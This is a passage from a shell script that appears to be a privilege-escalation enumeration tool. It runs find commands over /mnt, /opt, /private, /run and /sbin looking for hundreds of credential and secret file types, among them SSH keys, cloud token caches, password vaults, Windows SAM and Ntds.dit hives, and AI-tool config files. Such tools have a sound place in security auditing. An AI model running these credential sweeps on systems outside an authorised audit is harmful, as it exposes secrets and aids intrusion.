\"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"drives.xml\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"iis6.log\" -o -name \"TokenCache.dat\" -o -name \"security.sav\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MNT=`eval_bckgrd "find ${ROOT_FOLDER}mnt -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"apt.conf\" -o -name \"credentials.db\" -o -name \"printers.xml\" -o -name \"mysqld.cnf\" -o -name \"tomcat-users.xml\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name \".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o -name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"my.cnf\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"sess_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" -o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name \"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"drives.xml\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"iis6.log\" -o -name \"TokenCache.dat\" -o -name \"security.sav\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_OPT=`eval_bckgrd "find ${ROOT_FOLDER}opt -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"apt.conf\" -o -name \"credentials.db\" -o -name \"printers.xml\" -o -name \"mysqld.cnf\" -o -name \"tomcat-users.xml\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name \".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o -name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"my.cnf\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" -o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name \"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"drives.xml\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"iis6.log\" -o -name \"TokenCache.dat\" -o -name \"security.sav\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_PRIVATE=`eval_bckgrd "find ${ROOT_FOLDER}private -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"apt.conf\" -o -name \"credentials.db\" -o -name \"printers.xml\" -o -name \"mysqld.cnf\" -o -name \"tomcat-users.xml\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name \".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o -name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"my.cnf\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"sess_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" -o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name \"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"drives.xml\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"iis6.log\" -o -name \"TokenCache.dat\" -o -name \"security.sav\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_RUN=`eval_bckgrd "find ${ROOT_FOLDER}run -name \"*.timer\" -o -name \"*.service\" -o -name \"*.socket\" -o -name \"agent.*\" -o -name \"ssh-agent.sock\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SBIN=`eval_bckgrd "find ${ROOT_FOLDER}sbin -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"apt.conf\" -o -name \"credentials.db\" -o -name \"printers.xml\" -o -name \"mysqld.cnf\" -o -name \"tomcat-users.xml\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name \".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o -name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"my.cnf\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" 